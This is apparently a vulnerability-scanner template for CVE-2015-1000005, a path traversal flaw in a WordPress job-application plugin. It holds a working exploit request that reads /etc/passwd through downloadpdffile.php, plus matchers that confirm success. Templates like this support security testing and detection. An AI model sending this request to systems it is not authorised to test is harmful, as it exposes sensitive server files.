36 lines
1.1 KiB
YAML
36 lines
1.1 KiB
YAML
|
id: CVE-2015-1000005
|
||
|
|
||
|
info:
|
||
|
name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
|
||
|
author: dhiyaneshDK
|
||
|
severity: high
|
||
|
description: |
|
||
|
WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
|
||
|
- http://www.vapidlabs.com/advisory.php?v=142
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2015-1000005
|
||
|
cwe-id: CWE-22
|
||
|
tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/04/21
|